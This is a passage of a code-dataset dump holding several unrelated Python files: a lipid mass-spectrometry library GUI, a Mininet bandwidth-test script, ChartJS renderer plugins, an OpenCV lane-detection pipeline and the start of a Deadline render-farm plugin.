defined\n headgroup = ['Pi','Choline','Ethanolamine','Inositol','Glycerol']\n formula = []\n formula.append(np.array([0,3,0,4,1]+[0]*(len(package().elements)-5)))\n formula.append(np.array([5,13,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([2,7,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([3,8,0,3]+[0]*(len(package().elements)-4)))\n self.components = self.base.copy()\n for i,j in enumerate(headgroup):\n self.components[j] = formula[i]\n # sn type defined\n sntype = ['none','O','P']\n snformula = []\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,2]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,1]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,1]+[0]*(len(package().elements)-4)))\n self.sn = {}\n for i,j in enumerate(sntype):\n self.sn[j] = snformula[i]\n # extended structure(extended structure can be defined by library.baseext())\n namedf = pd.DataFrame({'a': ['PA'],'b': ['LysoPA']})\n namedf = namedf.append(pd.Series([name[0:-1]+'C' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'E' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'G' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'GP' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'I' for name in 
namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP2' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP3' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n sequencedf = pd.DataFrame({'a': ['PA'],'b': ['LysoPA']})\n sequencedf = sequencedf.append(pd.Series(['Choline-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Ethanolamine-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Glycerol-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[3,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Inositol-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[5,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[6,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[7,:]],index = sequencedf.columns), ignore_index=True)\n self.base = {'PA': 'PA','LysoPA': 'LysoPA'}\n for i in namedf:\n for j,k in enumerate(namedf[i]):\n self.base[k] = sequencedf[i][j]\n def basesn(self,base,typ):\n typ = base[typ].split('-')[-1]\n if 'PA' == base[typ]:\n return [['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6],'/',['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6]]\n elif 'LysoPA' == base[typ]:\n return [['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6]]\n else:\n return 0\n def iterate(self,base,typ,start,end):\n typ = base[typ].split('-')[-1]\n start = pd.Series(start)\n end = pd.Series(end)\n start = start.replace('none','')\n end = end.replace('none','')\n if 'PA' == base[typ]:\n return ['{}{}:{}/{}{}:{}'.format(i,j,k,l,m,n) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1) for k in range(int(start[2]),int(end[2])+1) for l in [start[3]] for m in range(int(start[4]),int(end[4])+1) for n in range(int(start[5]),int(end[5])+1)]\n elif 'LysoPA' == base[typ]:\n return ['{}{}:{}'.format(i,j,k) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1) for k in range(int(start[2]),int(end[2])+1)]\n else:\n return 0\n# %% [markdown]\n# library class\n\n# %%\nclass library(package):\n def __init__(self,pack):\n self.elements = package().elements\n self.elementsymbol = package().elementsymbol\n self.ion = package().ion\n self.components = {}\n self.base = {}\n self.sn = {}\n self.basesnorg = []\n self.iterateorg = []\n for i,j in enumerate(pack):\n self.components = {**self.components,**j().components}\n self.base = {**self.base,**j().base}\n self.sn = {**self.sn,**j().sn}\n self.basesnorg.append(j().basesn)\n self.iterateorg.append(j().iterate)\n def basesn(self,typ):\n base = self.base\n for i in range(len(self.basesnorg)):\n if not self.basesnorg[i](base,typ) == 0:\n return self.basesnorg[i](base,typ)\n def iterate(self,typ,start,end):\n base = self.base\n for i in range(len(self.iterateorg)):\n if 
not self.iterateorg[i](base,typ,start,end) == 0:\n return self.iterateorg[i](base,typ,start,end)\n def newhgdef(self,newheadgroup,newformula):\n self.components[newheadgroup] = newformula\n def baseext(self,name,sequence):\n self.base[name] = sequence\n def mscomp(self,name):\n components = name.split('-')\n base = components[-1].split('(')[0]\n sn = components[-1].split('(')[1].split(')')[0].split('/')\n hg = '('+name.replace(base,'')+self.base[base]+')'\n hgcode = []\n s = 0\n hg = hg.split('-')\n hg.reverse()\n for i,j in enumerate(hg):\n if ')' in j:\n s += 1\n hgcode.append(s)\n if '(' in j:\n s+= -1\n hg[i] = j.replace('(','').replace(')','')\n code = []\n for i,j in enumerate(hgcode):\n if i == 0:\n code.append([0])\n elif hgcode[i-1] == j:\n new = code[i-1].copy()\n last = new[-1]+1\n new.pop()\n new.append(last)\n code.append(new)\n elif hgcode[i-1] < j:\n new = code[i-1].copy()\n new.append(0)\n code.append(new)\n elif hgcode[i-1] > j:\n pre = max([k for k in range(i) if hgcode[k] == j])\n new = code[pre].copy()\n last = new[-1]+1\n new.pop()\n new.append(last)\n code.append(new)\n comp = pd.DataFrame({'headgroups': hg,'position': code})\n return comp\n def msformula(self,name,mode):\n components = name.split('-')\n base = components[-1].split('(')[0]\n sn = components[-1].split('(')[1].split(')')[0].split('/')\n headgroups = components[0:-1]\n for hg in headgroups:\n if '(' in hg:\n if ')' not in hg.split('(')[1]:\n headgroups[headgroups.index(hg)] = hg.split('(')[1]\n elif ')' in hg.split('(')[1]:\n headgroups[headgroups.index(hg)] = hg.split('(')[1].split(')')[0]\n elif ')' in hg:\n headgroups[headgroups.index(hg)] = hg.split(')')[0]\n ms = np.array([0,2,0,1]+[0]*(len(self.elements)-4))\n H2O = np.array([0,2,0,1]+[0]*(len(self.elements)-4))\n for hg in headgroups:\n ms += self.components[hg]\n ms += -H2O \n components = self.base[base].split('-')\n for c in components:\n if '(' in c:\n if ')' not in c.split('(')[1]:\n components[components.index(c)] = c.split('(')[1]\n elif ')' in c.split('(')[1]:\n components[components.index(c)] = c.split('(')[1].split(')')[0]\n elif ')' in c:\n components[components.index(c)] = c.split(')')[0]\n for c in components:\n ms += self.components[c]\n ms += -H2O \n for sni in sn:\n if 'd' in sni:\n carbon = int(sni.split('d')[1].split(':')[0])\n db = int(sni.split('d')[1].split(':')[1])\n ms += self.sn['d'](carbon,db)\n elif 't' in sni:\n carbon = int(sni.split('t')[1].split(':')[0])\n db = int(sni.split('t')[1].split(':')[1])\n ms += self.sn['t'](carbon,db)\n elif 'O' in sni:\n carbon = int(sni.split('O')[1].split(':')[0])\n db = int(sni.split('O')[1].split(':')[1])\n ms += self.sn['O'](carbon,db)\n elif 'P' in sni:\n carbon = int(sni.split('P')[1].split(':')[0])\n db = int(sni.split('P')[1].split(':')[1])\n ms += self.sn['P'](carbon,db)\n else:\n carbon = int(sni.split(':')[0])\n db = int(sni.split(':')[1])\n ms += self.sn['none'](carbon,db)\n ms += -H2O\n if mode == 'raw':\n return ms\n elif mode == 'molecule':\n formulalist = [i+'{}'.format(j) for i,j in zip(self.elementsymbol[0:len(ms)],ms) if j > 0]\n formula = ''\n for f in formulalist:\n formula += f\n return formula\n def mscalculator(self,name,ion):\n ms = (self.msformula(name,mode='raw')*self.elements[0:len(self.msformula(name,mode='raw'))]).cumsum()[-1]\n return self.ion[ion](ms)\n def export(self):\n expwind = tk.Tk()\n expwind.title('Export settings')\n expwind.geometry('700x300')\n var_base = tk.StringVar()\n initialbase = list(self.base.keys())\n title = tk.Label(expwind,text = 
'Select base')\n title.config(font=(\"Times New Roman\", 20))\n var_base.set(initialbase)\n listbox1 = tk.Listbox(expwind,listvariable = var_base,selectmode = 'extended')\n listbox1.config(font=(\"Times New Roman\", 12))\n var_add = tk.StringVar()\n subtitle = tk.Label(expwind,text = 'others')\n subtitle.config(font=(\"Times New Roman\", 15))\n other = tk.Entry(expwind,textvariable = var_add)\n other.config(font=(\"Times New Roman\", 12))\n def base_selection():\n global base_input \n base_input = [listbox1.get(i) for i in listbox1.curselection()]\n title.destroy()\n listbox1.destroy()\n button1.destroy() \n subtitle.destroy()\n other.destroy()\n addbutton.destroy()\n global sn_input\n sn_input = []\n def snloop(i,skip,add,apply):\n if skip == True:\n i += 1\n else:\n global menu_st,menu_end,var_st,var_end\n menu_st = []\n menu_end = []\n var_st = []\n var_end = []\n title = tk.Label(expwind,text = base_input[i])\n title.config(font=(\"Times New Roman\", 20))\n title.grid(row = 0,column = 0,padx=20)\n labelstart = tk.Label(expwind,text = 'start')\n labelstart.config(font=(\"Times New Roman\", 15))\n labelend = tk.Label(expwind,text = 'end')\n labelend.config(font=(\"Times New Roman\", 15))\n labelstart.grid(row = 1,column = 0,padx=20)\n label = []\n for n,sntype in enumerate(self.basesn(base_input[i])):\n if type(sntype) == str:\n label.append(tk.Label(expwind,text = sntype))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 1,column = n+1)\n else:\n var_st.append(tk.StringVar())\n menu_st.append(tk.OptionMenu(expwind,var_st[-1],*sntype))\n menu_st[-1].config(font=(\"Times New Roman\", 12))\n menu_st[-1].grid(row = 1,column = n+1)\n labelend.grid(row = 2,column = 0,padx=20)\n for n,sntype in enumerate(self.basesn(base_input[i])):\n if type(sntype) == str:\n label.append(tk.Label(expwind,text = sntype))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 2,column = n+1)\n elif type(sntype[0]) == str:\n label.append(tk.Label(expwind,text = ''))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 2,column = n+1)\n var_end.append(tk.StringVar())\n var_end[-1].set(var_st[n].get())\n menu_end.append(tk.OptionMenu(expwind,var_end[-1],*sntype))\n else:\n var_end.append(tk.StringVar())\n menu_end.append(tk.OptionMenu(expwind,var_end[-1],*sntype))\n menu_end[-1].config(font=(\"Times New Roman\", 12))\n menu_end[-1].grid(row = 2,column = n+1)\n i += 1\n def sn_selection():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n sn_input.append(self.iterate(base_input[i-1],st,end))\n if i < len(base_input):\n snloop(i,skip = False,add = False,apply = False)\n else:\n cancel.destroy()\n ion_selection()\n def apply_all():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n if apply == False:\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n 
sn_input.append(self.iterate(base_input[i-1],st,end))\n if i < len(base_input):\n if self.basesn(base_input[i]) in [self.basesn(base_input[p]) for p in range(i)]:\n snloop(i,skip = True,add = False,apply = True)\n else: \n snloop(i,skip = False,add = False,apply = True)\n else:\n ion_selection()\n def add_other():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n if apply == False:\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n sn_input.append(self.iterate(base_input[i-1],st,end))\n if apply == True:\n snloop(i-1,skip = False,add = True,apply = True)\n else:\n snloop(i-1,skip = False,add = True,apply = False)\n if skip == False:\n if apply == False:\n button2 = tk.Button(expwind,text = 'confirm',command = sn_selection)\n button2.config(font=(\"Times New Roman\", 12))\n button2.grid(row = 3,column = 0)\n button3 = tk.Button(expwind,text = 'apply to others',command = apply_all)\n button3.config(font=(\"Times New Roman\", 12))\n button3.grid(row = 3,column = 1)\n button4 = tk.Button(expwind,text = 'add',command = add_other)\n button4.config(font=(\"Times New Roman\", 12))\n button4.grid(row = 3,column = 2)\n expwind.mainloop()\n else:\n index = [self.basesn(base_input[p]) for p in range(i-1)].index(self.basesn(base_input[i-1]))\n sn_input.append(sn_input[index])\n if i < len(base_input):\n if self.basesn(base_input[i]) in [self.basesn(base_input[p]) for p in range(i)]:\n snloop(i,skip = True,add = False,apply = False)\n else: \n snloop(i,skip = False,add = False,apply = False)\n else:\n cancel.destroy()\n ion_selection()\n snloop(0,skip = False,add = False,apply = False)\n def add_base():\n initialbase.append(other.get())\n var_base.set(initialbase)\n other.delete(first = 0,last = 100)\n def ion_selection():\n title1 = tk.Label(expwind,text = 'Select ions')\n title1.config(font=(\"Times New Roman\", 20))\n var_ion = tk.StringVar()\n var_ion.set(list(package().ion.keys()))\n listbox2 = tk.Listbox(expwind,listvariable = var_ion,selectmode = 'extended')\n listbox2.config(font=(\"Times New Roman\", 12))\n title1.grid(row = 0,column = 0,padx=100)\n listbox2.grid(row = 1,column = 0,padx=100)\n def filename_type():\n global ion_input\n ion_input = [listbox2.get(i) for i in listbox2.curselection()]\n title1.destroy()\n listbox2.destroy()\n button5.destroy()\n title2 = tk.Label(expwind,text = 'Type filename(with.xlsx)')\n title2.config(font=(\"Times New Roman\", 20))\n var_file = tk.StringVar(value = 'library.xlsx')\n file = tk.Entry(expwind,textvariable = var_file)\n file.config(font=(\"Times New Roman\", 12))\n title2.grid(row = 0,column = 0,padx=100)\n file.grid(row = 1,column = 0,padx=100)\n def export():\n global filename\n filename = var_file.get()\n self.toexcel()\n expwind.destroy()\n root()\n button6 = tk.Button(expwind,text = 'export',command = export)\n button6.config(font=(\"Times New Roman\", 12))\n button6.grid(row = 2,column = 0,padx=100)\n expwind.mainloop()\n button5 = tk.Button(expwind,text = 'confirm',command = filename_type)\n button5.config(font=(\"Times New Roman\", 12))\n button5.grid(row = 2,column = 0,padx=100)\n cancel = tk.Button(expwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n cancel.grid(row = 2,column = 1,padx=5)\n 
expwind.mainloop()\n def cancelrun():\n expwind.destroy()\n root()\n button1 = tk.Button(expwind,text = 'confirm',command = base_selection)\n button1.config(font=(\"Times New Roman\", 12))\n addbutton = tk.Button(expwind,text = 'add',command = add_base)\n addbutton.config(font=(\"Times New Roman\", 12))\n title.grid(row = 0,column = 0,padx=20)\n listbox1.grid(row = 1,column = 0,rowspan = 9,padx=20)\n button1.grid(row = 10,column = 0,padx=20)\n subtitle.grid(row = 0,column = 1,padx=20)\n other.grid(row = 1,column = 1,padx=20)\n addbutton.grid(row = 2,column = 1,padx=20)\n cancel = tk.Button(expwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n cancel.grid(row = 10,column = 20)\n expwind.mainloop()\n def toexcel(self):\n with pd.ExcelWriter(filename) as writer:\n self.df = {}\n for i,b in enumerate(base_input):\n name = [b+'('+j+')' for j in sn_input[i]]\n self.df[b] = pd.DataFrame({b: name})\n self.df[b]['formula'] = [self.msformula(j,'molecule') for j in name]\n for ion in ion_input:\n ms = [self.mscalculator(i,ion) for i in self.df[b][b]]\n self.df[b][ion] = ms\n self.df[b].to_excel(writer,index = False,sheet_name = '{}'.format(b))\n# %% [markdown]\n# GUI\n\n# %%\ndef entry():\n package_available = {'Sphingolipid': package_sl,'Glycerophospholipid': package_gpl}\n entrywind = tk.Tk()\n entrywind.geometry('500x300')\n title = tk.Label(entrywind,text = 'Welcome! choose package(s)')\n title.config(font=(\"Times New Roman\", 20))\n var_pack = tk.StringVar()\n var_pack.set(list(package_available.keys()))\n listbox = tk.Listbox(entrywind,listvariable = var_pack,selectmode = 'extended')\n def choose_pack():\n pack = [listbox.get(i) for i in listbox.curselection()]\n global currentlibrary\n currentlibrary = library([package_available[i] for i in pack])\n entrywind.destroy()\n root()\n button = tk.Button(entrywind,text = 'confirm',command = choose_pack)\n button.config(font=(\"Times New Roman\", 12))\n title.pack()\n listbox.pack()\n button.pack()\n entrywind.mainloop()\ndef root():\n rootwind = tk.Tk()\n rootwind.geometry('500x300')\n def run_export():\n rootwind.destroy()\n global exp\n exp = True\n def cancelrun():\n rootwind.destroy()\n global exp\n exp = False\n del currentlibrary\n title = tk.Label(rootwind,text = 'Root')\n title.config(font=(\"Times New Roman\", 20))\n export = tk.Button(rootwind,text = 'Export data',command = run_export)\n export.config(font=(\"Times New Roman\", 12))\n cancel = tk.Button(rootwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n title.pack(pady = 5)\n export.pack(pady = 5)\n cancel.pack(pady = 5)\n rootwind.mainloop()\nwhile __name__ == '__main__':\n entry()\n while exp == True:\n currentlibrary.export()\n\n","repo_name":"yufongpeng/labtools","sub_path":"labtools/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":32774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44786147641","text":"import json\nimport os\n\nfrom mininet.net import Mininet\nfrom mininet.node import Host\nfrom mininet.link import TCLink\nfrom mininet.topo import Topo\nimport threading\nimport time\nimport sys\n\n# Define the timer function\ndef timer_function(duration):\n start_time = time.time()\n end_time = start_time + duration\n\n while time.time() < end_time:\n remaining_time = end_time - time.time()\n sys.stdout.write(\"\\rTime remaining: {:.2f} seconds\".format(remaining_time))\n sys.stdout.flush()\n time.sleep(1) # 
Update every 1 second\n\n print(\"Timer has finished!\")\n\ndef run_iperf_test(host, flow, dst_IP, duration, cc):\n cmd = f'{host} iperf3 -c {dst_IP} -t {duration} -C {cc} -J > json_files/h{flow}_{cc}_out.json &'\n os.system(cmd)\n\ndef change_btlbw(btlbw):\n delay = 20e-3\n BDP = 1\n burst = int(btlbw/250/8)\n limit = int(BDP*btlbw*delay*(1.024**2)/8) # Setting the limit to BDP\n\n sys.stdout.write(f\"\\n\\rCurrent BDP: {BDP}\\n\" )\n tbf_cmd = f'tc qdisc change dev s1-eth1 parent 1: handle 2: tbf rate {btlbw} burst {burst} limit {limit}'\n os.system(tbf_cmd)\n\ndef main():\n h = '/home/admin/mininet/util/m hs'\n \n duration = 300\n print(\"Starting test\")\n\n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(5)\n flow = 1\n run_iperf_test(f\"{h}{flow}\", flow, f\"10.0.1.{flow}\", duration, \"bbr\")\n time.sleep(60)\n\n print(\"Changing Btlbw to 1Gbps\")\n change_btlbw(1e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 1Gbps\")\n change_btlbw(1e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(60)\n \n sys.stdout.write(\"\\n\\rTest is done\\n\")\n time.sleep(5)\n\nif __name__ == '__main__':\n main()\n\n \n ","repo_name":"gomezgaona/bbr3","sub_path":"experiments/changing/run_changing.py","file_name":"run_changing.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26349761893","text":"from .. import ChartJSRenderer\nfrom prewikka.renderer import RendererUtils, RendererNoDataException\nfrom prewikka import version\n\n\nclass ChartJSCircularPlugin(ChartJSRenderer):\n plugin_author = version.__author__\n plugin_license = version.__license__\n plugin_version = version.__version__\n plugin_copyright = version.__copyright__\n\n def render(self, data, query=None, **kwargs):\n \"\"\" Return the HTML for this chart\n\n Keyword arguments:\n data -- List of tuple containing the data for this chart\n [(count, value, link), ]\n \"\"\"\n\n rutils = RendererUtils(kwargs)\n labels = []\n colors = []\n pie_data = []\n mapping = {}\n\n for i, d in enumerate(data):\n for count, value, link in d:\n label = rutils.get_label(value)\n pie_data.append(count)\n labels.append(label)\n mapping[label] = link\n colors.append(self._rgba(rutils.get_color(value), 1))\n\n if not pie_data:\n raise RendererNoDataException\n\n options = {\n \"labels\": labels,\n \"datasets\": [{\n \"backgroundColor\": colors,\n \"data\": pie_data\n }]\n }\n\n return self.generate_html(kwargs, options, {\"layout\": {\"padding\": {\"bottom\": 20}}}, self.renderer_type, mapping)\n\n\nclass ChartJSPiePlugin(ChartJSCircularPlugin):\n \"\"\" ChartJS pie plugin \"\"\"\n\n renderer_type = \"pie\"\n\n plugin_name = \"ChartJS : Pie\"\n plugin_description = N_(\"ChartJS Pie renderer type\")\n\n\nclass ChartJSDoughnutPlugin(ChartJSCircularPlugin):\n \"\"\" ChartJS doughnut plugin \"\"\"\n\n renderer_type = \"doughnut\"\n\n plugin_name = \"ChartJS : Doughnut\"\n plugin_description = N_(\"ChartJS Doughnut renderer type\")\n","repo_name":"pedroloco/SECEF-prototype","sub_path":"prewikka/prewikka/renderer/chartjs/pie/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42103292216","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport 
matplotlib.image as mpimg\nimport glob\nimport os\n\nfrom thresholding_utils import abs_sobel_thresh, mag_thresh, dir_threshold, hls_select\nfrom misc_utils import show_img, showstep, adjust_original_image, draw_on_original, mask, transform\nfrom lanedetect import sliding_window, fit_polynomial, fit_poly, search_around_poly\nfrom calibration import cal_transform, cal_undistort, maincal\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\nnx = 9\nny = 6\nSCALAR_EBLUE = (255, 255, 102)\n\ncal_images = glob.glob('./camera_cal/calibration*.jpg')\n\n\nobjpoints = []\nimgpoints = []\nlst_images = []\nobjp = np.zeros((ny*nx, 3), np.float32)\n# create nx*ny points of xyz coordinates\nobjp[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2)\n\nym_per_pix = 30 / 720 # meters per pixel in y dimension\nxm_per_pix = 3.7 / 700 # meters per pixel in x dimension\n\n\ndef measure_curvature_pixels(ploty, left_fit, right_fit, left_fitx, right_fitx):\n # We'll choose the maximum y-value, corresponding to the bottom of the image\n yval = np.max(ploty)\n\n A = left_fit[0]\n B = left_fit[1]\n C = left_fit[2]\n\n d1_left = 2*A*yval + B\n d2_left = 2*A\n left_curverad = (1+(d1_left)**2)**(3/2)/abs(d2_left) * ym_per_pix\n\n D = right_fit[0]\n E = right_fit[1]\n F = right_fit[2]\n\n d1_right = 2*D*yval + E\n d2_right = 2*D\n right_curverad = (1+(d1_right)**2)**(3/2)/abs(d2_right) * ym_per_pix\n\n lane_middle = left_fitx[0] + (right_fitx[0] - left_fitx[0])/2.0\n\n deviation = (lane_middle - 640)*xm_per_pix\n return left_curverad, right_curverad, deviation\n\n\ndef main():\n # calibration\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n imgpointsa, objpointsa = maincal(cal_images, objpoints, imgpoints, objp)\n\n dir_vid = dir_path + \"/test_videos\"\n print(dir_vid)\n vid = dir_vid + \"/project_video.mp4\"\n\n cap = cv2.VideoCapture(vid)\n print(cap.isOpened())\n out = cv2.VideoWriter('./test_out/pipeline.mp4', fourcc, 30.0, (1280, 695))\n while cap.isOpened():\n ret, img = cap.read()\n img, corners = cal_undistort(objpointsa, imgpointsa, img)\n # cv2.imshow(\"original\", img)\n gradbinary = abs_sobel_thresh(img, thresh_min=10, thresh_max=255)\n magbinary = mag_thresh(img, mag_thresh=(10, 255))\n # experiment with the combination of threshold values\n dirbinary = dir_threshold(img, sobel_kernel=3, thresh=(0.5, 1.3))\n hlsbinary = hls_select(img, thresh=(70, 255), thresh2=(0, 255))\n # show_img(hlsbinary, showstep=False, name=\"hls\")\n\n combined = np.zeros_like(dirbinary)\n #combined[(gradbinary == 255)&((magbinary == 255) & (dirbinary == 255))] = 255\n combined[(hlsbinary == 255) & (magbinary == 255)] = 255\n height_adjustment = 25\n vertices, masked_image, img2 = mask(combined, adjustment=height_adjustment)\n\n imgOriginalAdjusted = adjust_original_image(img, adjustment=height_adjustment)\n\n # cv2.imshow(\"adjusted\", imgOriginalAdjusted)\n # print(masked_image)\n # show_img(masked_image, showstep=True, name=\"masked\")\n # cv2.imshow(\"masked\", masked_image)\n warped = transform(masked_image, vertices)\n\n histogram, leftx, lefty, rightx, righty, out_img = sliding_window(warped)\n\n out_img, left_fit, right_fit, ploty = fit_polynomial(warped)\n result, left_fitx, right_fitx, pts = search_around_poly(warped, left_fit, right_fit)\n # plt.plot(histogram)\n # plt.show()\n # plt.pause(0.0005)\n # show_img(out_img, name=\"sliding window\", showstep=True)\n # show_img(result, name=\"polyfit\", showstep=True)\n\n dewarped = transform(result, vertices, mode=\"dewarp\")\n # show_img(dewarped, name=\"dewarped\", 
showstep=True)\n\n blended = draw_on_original(imgOriginalAdjusted, leftx, lefty, rightx, righty,\n vertices, pts)\n\n left_curverad, right_curverad, deviation = measure_curvature_pixels(\n ploty, left_fit, right_fit, left_fitx, right_fitx)\n # print(\"radius: \", left_curverad, right_curverad)\n\n cv2.putText(blended, \"Left curvature: {}, Right curvature: {}, Deviaton: {}\".format(\n left_curverad, right_curverad, deviation), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, SCALAR_EBLUE, 2)\n\n # print(blended.shape)\n # show_img(blended, name=\"blended\", showstep=True)\n out.write(blended)\n if cv2.waitKey(1) == ord(\"q\"):\n break\n cap.release()\n cv2.destroyAllWindows()\n\n\n# plt.ion()\nmain()\n\n# use this to debug\n# for i in range(20,150,5):\n# abs_sobel_thresh(img, thresh_min=i, thresh_max=255)\n\n# for i in range(5,150,5):\n# mag_thresh(img, sobel_kernel=3, mag_thresh=(i, 255))\n# print(i)\n# at 50 start to get less noisier lane lines\n\n# for i in range(10,150,5):\n# hls_binary = hls_select(img, thresh=(i, 255))\n\n# mag_thresh(img)\n# dir_threshold(img)\n","repo_name":"nicholasprayogo/udacity_selfdrivingcar_nanodegree","sub_path":"part1_p12_lane_detection/p2_adv_lane_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3826779321","text":"import os\nimport subprocess\n\ntry:\n import hou\nexcept:\n pass\n\ntry:\n from PySide2.QtCore import *\n from PySide2.QtGui import *\n from PySide2.QtWidgets import *\nexcept:\n from PySide.QtCore import *\n from PySide.QtGui import *\n\nfrom PrismUtils.Decorators import err_catcher as err_catcher\n\n\nclass Prism_Deadline_Functions(object):\n def __init__(self, core, plugin):\n self.core = core\n self.plugin = plugin\n\n @err_catcher(name=__name__)\n def isActive(self):\n try:\n return len(self.getDeadlineGroups()) > 0\n except:\n return False\n\n @err_catcher(name=__name__)\n def deadlineCommand(self, arguments, background=True, readStdout=True):\n deadlineBin = os.getenv(\"DEADLINE_PATH\")\n if deadlineBin is None:\n return False\n deadlineCommand = os.path.join(deadlineBin, \"deadlinecommand.exe\")\n\n startupinfo = None\n creationflags = 0\n if background:\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess._subprocess.STARTF_USESHOWWINDOW\n else:\n # still show top-level windows, but don't show a console window\n CREATE_NO_WINDOW = 0x08000000 # MSDN process creation flag\n creationflags = CREATE_NO_WINDOW\n\n arguments.insert(0, deadlineCommand)\n\n stdoutPipe = None\n if readStdout:\n stdoutPipe = subprocess.PIPE\n\n # Specifying PIPE for all handles to workaround a Python bug on Windows. 
